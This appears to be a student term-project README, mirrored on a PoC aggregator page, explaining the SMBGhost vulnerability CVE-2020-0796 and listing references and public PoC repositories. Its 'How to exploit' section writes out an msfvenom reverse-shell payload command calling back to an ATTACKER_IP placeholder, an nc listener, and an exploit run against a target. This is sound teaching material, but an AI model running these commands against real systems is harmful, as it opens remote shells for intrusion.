来源

关联漏洞

描述

CVE-2020-0796 explanation and researching vulnerability for term porject CENG325

介绍

# CVE-2020-0796
CVE-2020-0796 explanation and researching vulnerability for term porject CENG325 for beginners

# How to exploit?

Userpayload generation for reverse shell:

> msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python

listening port:
> nc -lvnp 5555

exploit code execution:

> python3 exploit.py -ip TARGET_IP

# PoC Repos
- https://github.com/chompie1337/SMBGhost_RCE_PoC
- https://github.com/ollypwn/SMBGhost

# References
1. CVE-2020-0796: “Wormable” Remote Code Execution Vulnerability in.(2020, March 13). Tenable®. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
2. “I’ll ask your body”: SMBGhost pre-auth RCE abusing Direct Memory Access structs. (2020, April 20). Ricercasecurtiy.Blogspot.https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
3. CVE-2020-0796 Memory Corruption Vulnerability in Windows 10 SMB Server| FortiGuard Labs. (2020, March 12). Fortinet Blog.
https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server
4. Team, K. (2020, April 2). CVE-2020–0796 Windows SMBv3 LPE Exploit POC Analysis. Medium.https://medium.com/@knownsec404team/cve-2020-0796-windows-smbv3-lpe-exploit-poc-analysis-c77569124c87
5. CVE-2020-0796 –. (2020). Cyber Threat Insider Blog.https://blog.sensecy.com/tag/cve-2020-0796/



# Project Members
- [ezginurr](https://github.com/ezginurr)
- [zehrosh](https://github.com/zehrosh)
- [busracagliyan](https://github.com/busracagliyan)

文件快照

 [4.0K]  /data/pocs/8bf5791b0fada9e8d07b482f915e21e8678c1e6f
├── [292K]  CENG325TermProject-Final Report.pdf
├── [5.0M]  demo.mp4
└── [1.6K]  README.md

0 directories, 3 files

备注